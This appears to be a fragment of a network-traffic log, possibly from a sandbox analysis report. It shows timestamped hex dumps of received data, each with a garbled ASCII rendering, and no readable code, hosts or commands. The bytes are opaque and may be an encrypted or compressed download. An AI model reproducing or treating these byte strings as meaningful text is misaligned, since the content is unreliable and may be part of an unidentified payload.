                                                                        2021-09-14 16:41:17 UTC58INData Raw: 45 70 05 1b 62 21 76 b2 e8 7e 04 4c 5e d7 c9 88 96 1d 8c 95 e8 7f f5 ec e6 a1 10 a5 82 3c e9 3c a2 5d 66 5e 7b 23 54 3a 08 c0 cc de ba f4 17 6b ce 80 69 e9 4f b3 59 97 e9 53 d1 42 ae 90 52 a5 8e 7b 85 fa a4 82 cc 26 5c 2a 7a 50 06 68 70 9b ba 7f 9a 40 be b6 ec 1d 2f b4 fa 32 c8 13 15 a4 25 a5 6e 09 c1 6b 2d ba 94 19 24 92 f7 ea 80 23 b1 41 dc b5 6f 84 4d 96 f5 99 8e 13 a8 83 11 33 63 42 1f 4a 77 42 0d f5 a8 34 9b 3a 13 d8 09 56 9b 5c 2e 14 0b 80 c5 2a 79 58 f6 e1 cc 7c 42 61 71 7d 92 e5 4f cd 49 1b 5f dd 92 6c 52 53 aa 3a 06 91 59 97 c5 1a ca db 81 bc 74 40 34 a8 87 a8 59 a4 b2 cc 22 2d 63 61 d7 25 37 a5 7d 29 ac c8 de 3b 8e 1c 90 44 cd 73 dd e3 e5 8b a5 7b d8 92 2f e6 18 31 ef 22 2e 77 a1 a2 60 7d b2 6b 38 41 c1 6d d2 29 90 a0 30 5d 79 ba 38 0b 71 75 1a
                                                                        Data Ascii: Epb!v~L^<<]f^{#T:kiOYSBR{&\*zPhp@/2%nk-$#AoM3cBJwB4:V\.*yX|Baq}OI_lRS:Yt@4Y"-ca%7});Ds{/1".w`}k8Am)0]y8qu
                                                                        2021-09-14 16:41:17 UTC59INData Raw: 10 72 4c 84 a4 52 78 88 3c 32 79 30 a2 86 8f 45 91 42 50 0e bc ec 66 22 7b ee 27 62 c4 4e da 58 89 01 b2 61 30 97 e0 b9 32 c8 68 32 09 19 3c fc a2 c2 05 ba 76 37 ce f0 69 23 ce 50 3a b0 87 80 20 83 0c 15 71 9e 56 83 47 2f 26 eb e3 58 d3 16 54 12 48 9c b7 b8 30 1a 33 7b 3a cb 99 cd 22 2a 8d 23 4f a7 b0 3e bb a7 66 c1 c4 6f e4 da a1 7f 23 78 ac 50 fb 2d 55 19 bd 5c 5e 32 b9 00 18 05 c2 79 af 9d 33 87 89 b2 5b 48 e5 1b 33 d8 b2 8a 7e 00 9a a1 46 07 c5 f4 8c 64 2c e6 b5 74 59 5e 4c 51 6d 8f c9 7e 84 ab b2 5a 24 51 88 29 fc 0c c9 f4 f1 a5 41 02 cf 6e 1e bb 36 f4 f4 25 7e b1 56 09 f3 42 21 a7 59 57 67 4d 33 0c 0c 8f fc be 65 36 eb e8 c7 a5 f8 90 8c 3e ed f2 1e b3 63 ed 0e c3 95 70 0f a8 85 d5 86 14 df 90 d8 4f 81 eb 32 77 33 cd 6d 39 63 b9 03 02 b3 54 0a 6f 5c
                                                                        Data Ascii: rLRx<2y0EBPf"{'bNXa02h2<v7i#P: qVG/&XTH03{:"*#O>fo#xP-U\^2y3[H3~Fd,tY^LQm~Z$Q)An6%~VB!YWgM3e6>cpO2w3m9cTo\
                                                                        2021-09-14 16:41:17 UTC60INData Raw: ae 35 33 82 58 5c bd 5b 9f 45 e4 53 26 b9 e0 b5 1b 50 e2 ef de f6 49 45 44 1c ec 84 55 d2 d6 e5 88 fa 94 c6 9a ad 6f e9 92 e2 ca fc 98 92 39 3b 5f 68 03 65 30 75 44 a3 5f 2c 7d 31 fd c1 9b 9a 32 a5 9c 87 6d 2a ec 32 6a 20 a8 9d 0b e9 36 bb 45 1f 97 c1 23 5e 3b 2c d0 f4 de b0 20 cb 6f e3 ad 4b c3 4f b3 18 e2 f5 53 d1 42 ae 90 e9 b7 8e 7b c1 ec a5 82 33 0e 5d 2a 75 45 06 68 6a 81 ba 7e 9b 53 8e b2 ea 29 2e b4 f0 b2 c8 13 14 b3 36 ae 43 9b c1 6b 37 ba 85 13 27 5c f2 c6 e1 23 de 88 a0 b5 65 8f 63 3a db be 9d 0a 8b ad 02 38 7c b0 6d 7d 7f 6a 25 fc 80 10 b5 20 06 fb 2a 47 90 41 f8 36 23 83 db 11 56 58 e7 e0 fe b3 43 4d 38 71 8e e6 67 ef c0 30 59 f5 b0 66 44 55 94 14 3a 03 5f bf e1 0c d9 d6 f8 b3 7c 42 3b ec 60 da e3 ae a1 ce 01 3d da db fe 60 39 ca c3 39 a4 ad
                                                                        Data Ascii: 53X\[ES&PIEDUo9;_he0uD_,}12m*2j 6E#^;, oKOSB{3]*uEhj~S).6Ck7'\#ec:8|m}j% *GA6#VXCM8qg0YfDU:_|B;`=`99
                                                                        2021-09-14 16:41:17 UTC61INData Raw: 30 55 05 0e c0 c0 b7 15 61 0d b1 86 90 c1 52 f3 e0 cc b9 00 62 21 85 ce a7 90 11 bc 00 49 b5 9e 7b b4 34 0e 3d 68 31 70 74 ed 33 a5 aa 5b 2f c8 72 60 88 b5 47 6d 94 3b 1c 50 25 a4 9e 66 c9 ba 5f 57 07 87 06 76 2a 67 88 22 4a 17 4b 78 43 a9 c1 a7 49 f2 be c4 b3 23 c4 77 05 2a 0e 3a fa a4 49 1d b0 88 37 f1 f1 71 3a dd 75 05 24 8c 93 27 21 0c 1b 7f 74 7f 67 43 39 21 e1 f6 4a fb 2c 56 09 b0 8a 16 b3 21 1e 5d a1 32 da 9b c8 59 53 9e 25 4b 14 a7 29 a6 4d 4f 25 cd 66 f9 1d aa 74 01 47 ae 50 ec 3c cf e0 bc 70 5c 39 a2 17 10 02 d3 ed dd 9c 1f 8f 03 8d 51 5c f7 38 e2 ca b4 80 7e 00 98 77 6a 2f c6 e5 89 ef 2b f7 b3 6a 46 b4 59 55 cc a4 cc 4c c1 d9 4d a5 0d 05 8c 38 f3 2d 98 fc 7f 18 29 06 a8 6f 14 bd 71 71 f5 25 7e 91 5f 1a f2 48 44 a6 5c 46 69 4f af 17 3c 81 f7 fd
                                                                        Data Ascii: 0UaRb!I{4=h1pt3[/r`Gm;P%f_Wv*g"JKxCI#w*:I7q:u$'!tgC9!J,V!]2YS%K)MO%ftGP<p\9Q\8~wj/+jFYULM8-)oqq%~_HD\FiO<
                                                                        2021-09-14 16:41:17 UTC63INData Raw: 19 37 de 8e 7e cb c4 48 b6 d0 c9 98 11 1e 9e b3 b5 5c 51 9a 2d 17 f2 cf 0a e0 30 d0 d8 74 7c 58 fc f8 49 68 b6 a3 a7 c8 ea 64 92 46 1d c9 f4 8c 32 a7 fc 47 42 9b 71 c1 10 97 71 b8 a8 e1 b9 35 57 77 d6 8e eb 61 63 ab 34 ee 84 cf d2 d8 eb a6 b5 30 c4 9a ab e2 f1 84 f8 c8 e8 05 83 38 4b 52 7c 9f 72 26 63 40 f1 c7 3d 7c 41 fa e3 1b 9c 35 b4 09 f9 72 34 c2 18 4b 35 8d b5 a0 f8 31 ae 79 03 78 6a 24 41 01 00 78 cc de b0 b6 04 6a fb b6 55 75 5e b4 07 91 c9 ac d1 42 ae 0c f8 a2 91 48 d7 66 b5 85 2c 12 7c aa 75 50 06 f4 7b 9c a5 4b ba c0 be b6 ea 81 3e b3 ef 05 e8 93 05 a5 25 39 6a 0e de 5c 21 26 85 1f 20 9a ec bf 73 30 b6 5e 99 aa 01 09 2f 2b ea a3 9b 78 1c bc 14 2c 5e 51 0e cd 67 45 14 c2 9f 7a 03 2b 12 ef 17 49 fe ca 17 30 10 be dc 22 c1 49 f1 f4 db 52 36 fd 6a
                                                                        Data Ascii: 7~H\Q-0t|XIhdF2GBqq5Wwac408KR|r&c@=|A5r4K51yxj$AxjUu^BHf,|uP{K>%9j\!& s0^/+x,^QgEz+I0"IR6j
                                                                        2021-09-14 16:41:17 UTC64INData Raw: eb c6 20 af 14 d7 7a 1a 69 9b 6b 8e 99 12 71 a6 bc 88 43 e0 fb fb 7e 44 68 d2 7f 7b 3d 43 ce c1 95 e7 e0 b6 7a fa f2 d8 1b bf ef e6 1b ea bc 34 44 15 bf d7 e2 64 3d 3e 09 b1 91 34 cc b6 e1 c5 e1 bc 51 7f 34 90 c9 a7 9f 1f 57 17 76 ad a4 4e ac 4e fe 28 f2 28 71 7b fb 24 a8 d4 ef 37 36 79 60 97 a6 51 78 83 47 a8 51 34 a8 f4 8a c8 96 59 43 03 be e8 5f d3 6d 90 45 71 c3 5b 6c 5e 57 06 b2 58 ec 87 f5 3d 94 fc bb 0b 26 35 67 fe b5 49 6d 08 77 36 d7 d0 69 2b d8 4d a5 33 96 88 4e 52 1c 1d 6f 5a 6b 4b 46 2e 04 ee e5 4c f1 0e 43 03 44 9a 32 97 ac 1a 32 62 5d fe 93 db 5a 77 37 23 4b 05 b0 30 bb 9b ca 0b c5 69 f9 46 a0 6b 0b 55 bb 46 ec 2c ce 0f b5 74 4e 21 b1 1b b2 02 c3 e6 34 8c 24 92 3f b4 de 73 f1 33 fa ca aa 91 77 10 99 15 7a 1b ed 51 9a e9 21 f7 ad 63 dd 66 53
                                                                        Data Ascii: zikqC~Dh{=Cz4Dd=>4Q4WvNN((q{$76y`QxGQ4YC_mEq[l^WX=&5gImw6i+M3NRoZkKF.LCD22b]Zw7#K0iFkUF,tN!4$?s3wzQ!cfS
                                                                        2021-09-14 16:41:17 UTC65INData Raw: 13 19 ea ae bf 16 87 14 90 e8 e5 b3 f3 d5 72 63 83 b1 c4 ef 1a 36 7b 8b c8 53 ac 2a 59 73 40 d0 36 21 76 b9 91 2f 29 3a bc 20 80 56 6a ad db 11 bd c6 91 68 56 c6 6d b8 d2 ff 76 1f 36 8f 2f a4 51 ec aa 19 9c f5 44 2a c2 26 4d 6b 62 41 63 fb 76 70 7e a9 87 8d ea fb 46 81 f9 1d ed ff bd 3d b6 c2 40 5d bc 42 65 01 b3 67 33 25 f7 82 05 57 77 d6 ad ec 5e df 3a 10 f9 ac f4 c3 df fe a9 84 94 d2 0a 87 75 f1 a0 f1 78 d6 88 92 3f 5e 6a 64 12 47 39 ec 40 ec 4a 0f 63 c4 ff d2 9b 9c 3f a7 87 f9 64 3f c4 bb b6 35 8b a3 b1 ee 36 b1 57 01 f0 6f 34 76 96 20 f8 c6 f8 a1 3b 01 45 89 83 43 ef 59 3e 1f a3 e9 52 c5 56 ba 87 c1 02 8e 7b cb dc b5 8c 24 ab 5b 2a 75 51 15 4b 7b b8 ac 68 16 7f be b6 eb bf 3e 97 e4 1b 7a 13 05 af 05 75 7b 09 c1 e7 08 ba 94 19 29 8a 02 eb ef 2b 9d 44
                                                                        Data Ascii: rc6{S*Ys@6!v/): VjhVmv6/QD*&MkbAcvp~F=@]Beg3%Ww^:ux?^jdG9@Jc?d?56Wo4v ;ECY>RV{$[*uQK{h>zu{)+D
                                                                        2021-09-14 16:41:17 UTC66INData Raw: 4c 76 f0 26 a3 55 0d 0d 89 38 ff 6a c6 fc 7f 18 03 3f df 61 3c e6 1a 63 f2 4a 6d b8 39 11 cb 86 2b b4 5d 57 75 7a a6 da 1f 9d e6 74 62 20 92 ce d1 bd 24 90 93 01 af cb 36 a0 44 f6 f7 d2 b5 35 2c aa 84 c3 97 1a c8 1d ca 4f 5f 19 21 44 38 ef 7b 29 60 05 3f 02 ba 54 a8 7e 08 2b ad 77 86 a7 44 9d 82 a2 58 ae 66 61 23 f4 8c 1c a9 35 9a 3e 8e a7 3f 69 17 fe 5b 6b 6b 5d 4e 62 47 b9 9c f5 12 58 7f 0b 94 d2 7b 2b 88 69 9a 83 a3 23 76 71 b8 65 2a 69 05 c7 b6 38 f3 9f 0a cd 7b 07 10 92 2d 13 13 c3 e2 97 bb 8d 03 4c 49 e1 a2 fd c3 ec 6a 95 a2 c8 ea 2a 34 70 b3 db 4b 26 06 56 65 52 66 54 20 60 91 25 3c 39 21 b2 4b 24 05 6e ad dc 1e 18 33 90 68 5d ef 13 56 0f 16 70 02 13 8f 37 b7 4d 76 19 3a 8b e3 d9 18 fb bd 4d c9 73 72 68 d3 f0 59 6f a9 96 88 60 72 67 92 dc 63 d7 ea
                                                                        Data Ascii: Lv&U8j?a<cJm9+]Wuztb $6D5,O_!D8{)`?T~+wDXfa#5>?i[kk]NbGX{+i#vqe*i8{-LIj*4pK&VeRfT `%<9!K$n3h]Vp7Mv:MsrhYo`rgc
                                                                        2021-09-14 16:41:17 UTC67INData Raw: a4 96 f2 fa bc ac 2e 80 ad 19 20 6a 66 54 51 76 48 d5 fe 86 3c 9f 7b 09 f0 2a 56 9b 56 06 31 0f 80 c3 12 5f 58 f6 fd e6 4d 42 6e 7b 51 8e f8 67 ef 4c 00 69 f6 b1 40 52 59 82 03 02 91 4e bd e2 32 be d1 ee aa 70 57 e4 19 8a dc e7 8c c6 c6 08 20 1a 4c dc fb 2f e2 f2 28 ac c8 e5 1c b4 fe 97 4e e5 59 d4 cb 56 54 a5 77 e1 97 4c c4 1a 31 e9 31 2b 68 a8 a6 1d dd b3 6b 33 3d 8f 6e d2 0a ff df 31 58 73 a9 23 25 18 5f 01 da 5c ab cf 18 f6 e4 d6 8a 4e 96 3f da b2 92 58 15 f1 45 67 9d f3 88 d9 ad a4 43 02 5b 76 26 d5 64 6a 93 f6 8c 57 87 f9 2b 40 9a 16 76 c6 b5 82 06 33 04 50 b4 b4 4d f7 a7 68 a7 ef 3f 8f 39 95 6e ad c8 3d 53 39 1f d4 45 d8 03 c3 78 1c 65 c0 67 8e 99 12 71 a8 b7 00 7e 95 ff fa 6b 76 5d c8 69 59 49 76 ce c7 3d da ea b0 57 8f 83 dc 1d 1b d6 d8 03 c2 e8
                                                                        Data Ascii: . jfTQvH<{*VV1_XMBn{QgLi@RYN2pW L/(NYVTwL11+hk3=n1Xs#%_\N?XEgC[v&djW+@v3PMh?9n=S9Exegq~kv]iYIv=W
                                                                        2021-09-14 16:41:17 UTC68INData Raw: 3a d9 05 8d 5a 5f 40 b1 11 10 83 d5 f5 32 ee 52 87 2b a9 5e 55 9e c6 fa d9 b8 93 69 04 a6 ef 6a 03 cf e1 9f f8 2d f7 b0 63 5c 4f d6 ce a1 79 c8 74 fa 2d b5 4d ff 55 5b b5 a6 05 df fc 73 03 28 3f cb 78 05 b2 90 d4 fc 33 1b 4e 38 1b f8 64 23 c7 a5 47 63 6f bc 08 1d 81 fd be 65 36 eb e8 c7 a5 f8 90 8c 3e ec f2 1e b3 63 ed 0e c3 94 70 0f a8 84 c4 96 14 df 90 cd 4f 5f 56 7c 66 38 d7 6d 38 79 9a 30 00 ba 67 0a 6f 2a ae 85 c5 97 b1 45 9e c3 a2 5f b3 b0 8a 0e f6 9e 3f 7d 33 8c ca a7 af 3d 7e 16 91 78 71 95 5a 73 78 7b 6d a4 0e 2b c1 68 86 99 d0 53 4c 9a 4f 81 ca a7 33 6e f7 ad 65 2a 73 97 d5 90 ea da 2d 0a 5f 71 18 21 6d a8 13 13 c8 fe 97 38 8f 03 40 76 ca 9b dd d6 61 6b 99 d1 d2 f8 09 23 58 8d e8 57 aa 3f 7e 46 53 c4 4f 2b 0d bd 97 3a 11 0f ad 34 a2 12 5f ad dd
                                                                        Data Ascii: :Z_@2R+^Uij-c\Oyt-MU[s(?x3N8d#Gcoe6>cpO_V|f8m8y0go*E_?}3=~xqZsx{m+hSLO3ne*s-_q!m8@vak#XW?~FSO+:4_
                                                                        2021-09-14 16:41:17 UTC70INData Raw: 33 20 74 a0 71 50 00 40 f2 98 ba 78 e9 bc bf b6 e0 72 d2 b5 f0 39 de 1b 6a 5b 24 a5 71 1e 1b 78 25 a9 90 20 18 a3 f3 ea 91 de b0 41 aa bd 7e 91 51 2c f7 99 8e 62 81 af 13 39 0a fe 6d 51 7c 51 0c ef 87 3b bd 44 29 f0 2a 5c 93 47 02 58 0f 82 c3 08 26 59 f4 eb ee 22 f2 60 7b 5b 9d e5 76 e8 60 1e 61 17 b1 6c 52 4f 0f 32 02 91 5e ac e4 0b cd d9 ff a4 1a 40 30 83 8b a0 e1 a6 b2 cc 67 98 0d d6 dc 0d 2c ca c5 22 bf c4 dc 34 9b fb 4c f2 cd 61 d4 da 5a e5 d6 70 cb 9c 8c d1 1a 31 e8 19 3f 70 b0 ac 3c d7 a2 6d 1a b2 bf 6c d8 0b f6 de 31 5b 60 ac 19 3a 02 72 6e c8 5b bc 2a 0a df f7 cb a9 46 90 29 22 a0 b6 4b 0a d2 d9 60 85 07 a1 7a ae 8f 4b 04 dd 07 07 b8 f9 6c 80 f5 b7 5e 8f e8 34 1f 9f 14 ce cd ce 81 89 33 0e 2e b6 98 4f f1 b0 6a c5 5d 2b a7 b8 9b 71 b1 f6 0b 54 39
                                                                        Data Ascii: 3 tqP@xr9j[$qx% A~Q,b9mQ|Q;D)*\GX&Y"`{[v`alRO2^@0g,"4LaZp1?p<ml1[`:rn[*F)"K`zKl^43.Oj]+qT9
                                                                        2021-09-14 16:41:17 UTC71INData Raw: 76 50 b8 2e 00 f3 f4 4b e3 22 3b 8e 52 98 32 bf 21 12 2f 96 33 f6 98 ca 5b 55 92 00 d7 1b b2 3e af a2 46 16 d3 91 ef e7 aa 63 02 40 c7 54 ff 3a d2 14 a2 4b 4c 29 b1 00 18 0c de 0b 22 b1 34 97 2c ae 4c 50 e2 3b fb c8 ba 9f 7d f8 8f a5 6c 12 c1 ff 85 fa 38 ee b5 64 45 55 55 87 cf a3 c5 6a 7d 0d b2 5a 24 51 89 27 f7 16 d7 fd 6e 1a 31 24 30 6f 38 be 0f 64 e9 38 e8 a6 32 08 fa 42 3a bc 47 b8 62 49 a6 1d 0b 92 e8 32 e8 08 d0 d7 c7 b4 fa 9a 75 2b ca d3 37 b4 75 f8 c7 5f 88 49 07 a8 95 cd 99 03 21 91 e1 5c 59 1a 24 64 a7 7a 7c 3d 6e e6 05 00 ba 5f 2c 70 32 2c 8d c5 97 af 51 a5 26 a3 74 ae 5f 8d 35 22 95 32 62 25 89 3c a6 92 37 76 0e 6f 7e 45 61 28 59 78 50 65 83 f2 17 45 60 86 82 da 64 23 65 4e a7 af a4 35 72 e2 df f9 35 62 b4 de 90 3d d3 32 1f 33 70 34 3b 16 0a
                                                                        Data Ascii: vP.K";R2!/3[U>Fc@T:KL)"4,LP;}l8dEUUj}Z$Q'n1$0o8d82B:GbI2u+7u_I!\Y$dz|=n_,p2,Q&t_5"2b%<7vo~Ea(YxPeE`d#eN5r5b=23p4;
                                                                        2021-09-14 16:41:17 UTC72INData Raw: f8 2c 9c 96 8d b5 36 c1 aa b1 56 1f f7 70 32 56 25 08 61 c8 de b6 3c 98 6a e4 87 42 fd 5b a7 30 00 e9 53 db 56 86 47 ea a5 88 6d 4c fd a4 82 32 32 48 3e 5d f3 06 68 60 b3 26 7e 9a 4a 96 2c ee 1d 29 9c ff 32 c8 15 16 af 34 ae 53 86 c0 6b 3d 97 ab 09 35 8a 7c eb ef 2b 9c 77 d3 97 6d 95 38 3f f9 88 88 31 18 a9 13 35 0a 64 6e 51 70 53 07 ef 8b 79 bb 38 15 f6 3b 5a 8a 5c 69 11 0d 80 c5 13 51 49 ff 84 cc 4f 42 67 7d 40 82 8d 7f ee 4d 11 87 fa 94 44 65 59 82 13 11 9c 77 87 e1 1a c0 0f ee b1 70 57 e4 90 84 ca e6 b5 bd f8 a3 d4 f3 29 08 34 18 e2 f2 28 ac c8 de 3c b0 f3 b9 7c cd 61 de 15 5e 8c 8f 78 e1 96 5c 85 2e 31 e9 31 2b 70 b0 2c 0f c7 b3 5c 33 2e bf ad d3 23 ff d0 31 5d 73 b3 32 33 12 74 1a da 5b f7 31 19 da 70 cf 81 4e 70 28 24 b3 af 5a 02 fa 5f 60 85 0c 92
                                                                        Data Ascii: ,6Vp2V%a<jB[0SVGmL22H>]h`&~J,)24Sk=5|+wm8?15dnQpSy8;Z\iQIOBg}@MDeYwpW)4(<|a^x\.11+p,\3.#1]s23t[1pNp($Z_`
                                                                        2021-09-14 16:41:17 UTC74INData Raw: 0a ef 90 43 62 58 5b 76 56 8d 35 52 49 f8 96 7c a2 2d d1 71 05 48 81 2d f4 aa 41 1d f6 ea 27 d3 e7 77 0b 33 47 b6 3b 1b 91 2f 32 18 1a 16 07 7f 4b 40 3c 28 24 f1 69 d3 0a 50 12 44 98 3c b9 3c 32 0a 68 32 d0 4c 1c 5c 4f 8d 32 4f 2d f4 32 af b5 21 8e c4 6f e8 dd 59 6a 1a 50 c7 d8 fc 3a de 08 43 5e 49 df b0 71 3c 11 d3 df 35 8c 37 e9 a3 a2 53 5a e6 e9 e8 d6 a1 89 57 8e 8e 89 6b 12 c1 e3 93 c1 b5 e2 b5 73 22 c0 59 79 c8 9c c1 65 f4 37 bb 72 d2 41 8d 3e 96 8f de fd 79 01 23 3f ca 7f 1d 9f 81 67 f4 23 1b 33 38 1b f4 51 2c c7 55 44 63 63 bc 00 24 12 f7 60 7e 02 cf ce c0 8d 94 82 8b 20 ef cb 23 dc 69 e5 d0 c5 fd 48 0e a8 8e d6 8c 67 fd 92 cd 49 4c 13 23 6d 01 6d 69 38 7e e6 2a 00 ba 53 1b 64 3b 32 ea e1 84 a7 48 a4 d3 b3 52 cb 68 89 22 f2 97 3f 6c 3c f5 1c a4 83
                                                                        Data Ascii: CbX[vV5RI|-qH-A'w3G;/2K@<($iPD<<2h2L\O2O-2!oYjP:C^Iq<57SZWks"Yye7rA>y#?g#38Q,UDcc$`~ #iHgIL#mmi8~*Sd;2HRh"?l<
                                                                        2021-09-14 16:41:17 UTC75INData Raw: 4c 3d 25 eb 26 42 cc cc e4 9e 85 a4 d0 8d 26 51 e0 83 e6 f1 ef 88 83 29 43 e5 7b 12 74 09 db 6c e7 51 0a 6a 4f c1 53 b7 83 24 a4 83 72 5d 3a ec 38 be e5 98 b5 3c e8 1e a5 56 15 ee 53 17 5f 31 2a 8c d9 de b0 2b 06 68 f5 80 57 c1 e9 b7 18 a5 fe de d6 42 ae 91 fa b5 9f 6b d7 d2 03 86 33 20 fe 3b 65 44 12 7c 42 38 ba 7e 90 54 96 1e ee 1d 29 a2 7d 34 c8 13 04 b1 31 b1 53 aa c1 6b 3d 92 08 18 3f a8 e0 e3 fe 26 a5 69 06 b1 6f 93 29 a1 f2 99 84 18 93 bd 02 23 73 66 c5 55 76 44 a9 ef 90 02 8b 2e 3d 53 2a 56 91 42 2e 9f 0b 80 c5 14 d0 5f f6 eb e5 59 56 75 53 f2 8e e2 6d c7 d1 1b 59 ff a2 64 43 50 ae 40 13 98 77 30 e0 1a c0 fc be b1 7d 6c 7e 92 89 f3 6c a5 b2 cc 25 69 7f f4 d4 25 3b d9 cf 39 a6 d3 c4 1a a1 ff 91 42 a2 45 d6 cb 5a 9b af 60 c3 be 4b c5 1a 37 86 17 29
                                                                        Data Ascii: L=%&B&Q)C{tlQjOS$r]:8<VS_1*+hWBk3 ;eD|B8~T)}41Sk=?&io)#sfUvD.=S*VB._YVuSmYdCP@w0}l~l%i%;9BEZ`K7)
                                                                        2021-09-14 16:41:17 UTC76INData Raw: c4 48 97 20 57 05 4d 81 8a 7f bb 4d c7 12 68 3b 76 7c be c5 a5 bb 5d 29 3d 7e 4c 87 a8 4f 97 8f 04 12 68 33 a0 80 98 d7 8a 4f 50 06 b0 ea 89 2b 41 9e 93 42 c4 4a 7a 61 95 15 a6 43 f4 89 ef be 23 c7 66 e4 22 31 2a fe 9d 7b 07 ba 70 1e e8 fd 78 2d b7 3f b6 3b 8d 7e 2a 23 1d 06 68 8a 77 5c b8 2e 00 f8 fd 41 fb 34 4f 0a b0 8a 16 b7 08 a1 33 68 32 c5 88 d6 5c 46 92 2f b5 04 8d 3e 97 18 4f 09 c5 70 e3 c6 a7 62 14 40 56 51 d1 34 08 05 bd 5c 5d 09 a5 11 10 19 d9 ea 36 90 33 8f 34 be ad 5d dd 3d 2b c5 b2 80 6d 2e 9a 89 6b 09 c9 ed 84 e4 2b ef aa 6c b3 4b 74 6b ca a7 f5 71 f0 20 a4 72 0b 42 8d 32 ef 36 fe e2 65 1f 2e 27 d1 7f ea b6 32 6d 24 07 74 b9 3b 33 e6 42 2b be 51 59 71 68 af 05 13 99 09 61 58 06 c7 f7 fa a0 f2 85 9d 02 c8 da 26 b9 75 a7 e2 c2 92 5a 10 b5 89
                                                                        Data Ascii: H WMMh;v|])=~LOh3OP+ABJzaC#f"1*{px-?;~*#hw\.A4O3h2\F/>Opb@VQ4\]634]=+m.k+lKtkq rB26e.'2m$t;3B+QYqhaX&uZ
                                                                        2021-09-14 16:41:17 UTC77INData Raw: ca 0d c9 26 4b df 8d 62 57 e8 73 53 6f ae 9f 79 49 c6 66 b9 d8 27 2d e9 d2 48 3b ed 44 77 9f 53 42 6d fb 71 24 bd cc a6 12 41 f8 f7 8b f4 61 43 2b 34 7f 84 53 d2 c9 ff a4 8e b0 c3 8d 55 7f cc 81 ff e9 fe 9e 84 c1 55 55 68 14 68 21 7b 74 19 5a 00 79 75 d5 e8 78 9e 4e d9 95 e8 71 01 da 3a b7 1d 9c b5 3c e3 4b dc 56 15 e0 51 23 5e 22 10 fa cc f6 b0 2a 15 cb e4 87 52 ff 44 98 03 a3 ee 44 2f 43 82 92 f1 ae 8e 7c d7 04 a5 ae 31 31 57 2a 72 48 f8 69 46 99 91 7c b1 a3 bc cd 84 1d 2f b0 da 11 ca 10 78 cb 25 a5 7f 23 c7 41 37 a9 a4 1c 3f 20 f3 ea ef 21 b1 41 a0 b7 47 82 3e 2c ff 9a a9 12 a8 92 16 33 63 3d 4a 53 76 48 71 fc 83 3e 04 3e 15 f6 fa 43 9b 56 07 1f 1b 80 c3 08 32 7f f4 eb ee 65 de 61 7b 5b e1 fd 66 ef 4b 19 2a a4 b0 6c 54 36 a9 18 02 97 5d d0 cb 1b ca d7
                                                                        Data Ascii: &KbWsSoyIf'-H;DwSBmq$AaC+4SUUUhh!{tZyuxNq:<KVQ#^"*RDD/C|11W*rHiF|/x%#A7? !AG>,3c=JSvHq>>CV2ea{[fK*lT6]
                                                                        2021-09-14 16:41:17 UTC79INData Raw: 49 87 c9 45 51 79 4c ce c0 21 08 fb 8d 50 b0 fd d8 1a 05 00 fd 2f c0 c9 32 6f f0 1f bd 84 7d 15 65 27 93 95 95 a0 d0 f2 cc cd b8 53 7f 32 90 fe b4 96 24 42 01 65 b1 8f 7f ac 4d e4 17 73 3b 7b 7d 00 34 89 b9 45 3d 36 74 5a 70 b6 78 6b 99 23 1a 57 2c 5c 81 b4 ca bd 40 7b ec ad 9f 0a 2a 6d 94 69 40 c6 49 05 34 81 15 a2 63 f8 96 e0 a0 13 cc 7c 32 23 1d 3c f2 b5 4f 13 ac 7d 1d c6 f8 7f 3c 26 46 9a 39 9f 8b 21 26 0b e3 64 a6 7c 5c 4d 2f 2b e2 1b 4d d7 3f 7b 10 65 68 38 c4 4e 1a 32 6c 18 f8 93 d8 21 31 8d 23 4f 2f 9b 34 87 a4 4e 09 cf 6d f9 b6 24 6b 0b 50 82 43 cd 38 d8 36 bd 5c 5f 29 b1 11 01 05 de de 38 9d 34 91 d5 a2 7f 5e e9 38 fb de a4 7e 6e 2a 8c 9e 60 03 c2 ea 64 e8 07 e4 9e 77 66 a9 5a 02 b1 8f c9 70 da 04 b0 59 58 3d 8d 38 fd 2f df fd 7f 01 1e 2c ce 46
                                                                        Data Ascii: IEQyL!P/2o}e'S2$BeMs;{}4E=6tZpxk#W,\@{*mi@I4c|2#<O}<&F9!&d|\M/+M?{eh8N2l!1#O/4Nm$kPC86\_)84^8~n*`dwfZpYX=8/,F
                                                                        2021-09-14 16:41:17 UTC80INData Raw: 39 cc 4c 84 25 ca 63 4c eb 65 88 74 b9 97 a0 3f 34 9d 2b e1 a6 68 b2 ec 1e ac c7 8e 5a 77 09 4f a9 f0 75 61 0e 2d 81 20 38 5d 51 8f 24 bb 7f ce 0a f7 06 ec c9 73 63 e7 ec 7b 6e 4f 37 87 87 48 76 62 8d ed 2c 33 eb a9 24 a7 eb 5f 65 a2 58 dd 16 88 48 04 3c e6 a6 12 dd ed d8 b3 d4 b8 43 2b 34 72 82 4c f8 ff 3c 8f 95 b0 58 9c b4 42 c0 29 e7 e2 fe 05 94 20 69 66 1f 9f 65 3e 42 4c 26 5b 2c 7b c2 d1 dc a4 82 a9 b2 8a a8 6e b7 ea 27 f5 2a f4 29 3a f6 74 a6 ca 13 fb 38 03 bc 31 20 f8 50 d8 af 6e 35 fa e4 87 43 75 49 ac 5d 83 31 53 d1 42 32 96 f6 e3 ae d4 c1 fa a4 1e 35 39 1b 0a f5 50 06 68 f6 9d a5 36 85 78 22 b0 f5 54 30 d4 6c 35 d7 59 1a ae b9 a3 64 42 de 1a ab bc 8b 54 20 ac 6f ec f0 6c ae 29 3c b3 70 db 21 7f 69 9f 9b 56 9f da 8f 35 7a 1e 73 7e ea 44 14 af 9f
                                                                        Data Ascii: 9L%cLet?4+hZwOua- 8]Q$sc{nO7Hvb,3$_eXH<C+4rL<XB) ife>BL&[,{n'*):t81 Pn5CuI]1SB259Ph6x"T0l5YdBT ol)<p!iV5zs~D
